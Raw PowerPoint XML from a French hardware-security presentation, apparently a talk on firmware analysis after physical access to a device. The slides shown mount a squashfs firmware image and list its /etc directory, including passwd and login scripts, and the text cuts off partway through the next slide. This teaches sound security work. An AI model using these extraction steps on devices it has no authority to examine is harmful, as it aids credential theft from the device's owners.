                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3212019321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>…</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tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2261863994"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3978992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199CB0C-E544-E1D4-27E6-5576CB89CFAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43BE4AB-6E33-E26A-C75A-774EEE99F30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Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAF8CF9-5F1D-D1D7-B595-94E49CB91BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Filesystem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC44F24-1FAC-1FB1-14F2-F33282B8BFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C699EBBC-8982-E5D9-F4F8-E0ECB690100F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4338F20-1CF7-D3BC-3720-E365C2AF1071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307576" y="1545800"/>
            <a:ext cx="7072018" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>squashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RFS.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>squashfs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>squashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999    97  4 déc.   2019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inittab</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxrwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999   175  4 déc.   2019 insmoddrv_pre.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxrwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999  1367  4 déc.   2019 insmoddrv.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwxrwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  1 999 999    24  4 déc.   2019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -&gt; /var/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localtime</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxrwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999   240  4 déc.   2019 login.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999  1112  4 juin   2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>minicom.users</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--r--  1 999 999   695 17 janv.  2011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nscd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxrwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999   464  4 déc.   2019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nsswitch.conf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  1 999 999  5209  4 déc.   2019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{447521AE-A4F3-85BA-52D8-B59E7BF0DD3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338938" y="1221769"/>
            <a:ext cx="8439936" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Monter le système de fichiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0F39F7-5745-D6F9-5B77-1B9BBF5187C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338938" y="2897746"/>
            <a:ext cx="6976262" cy="163463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15306BC-7E4F-D20C-00C8-2D1DDC60B1D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338938" y="2156828"/>
            <a:ext cx="6976262" cy="163463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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67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2FAA0DF-12C0-D41A-38CD-CCC732C26B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC215AD-35A8-62C1-652E-D4E213519463}"/>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Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9BA11B-4C24-1EB7-BD62-095012DDF825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Filesystem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE0EB2CF-1F9F-C76F-8CF2-17E4B2C52B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EFEF07-8147-2431-43A6-B2B6BD0E07A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9570F4C-04FD-4995-D457-C619A76EF7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269215" y="1315427"/>
            <a:ext cx="1872208" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
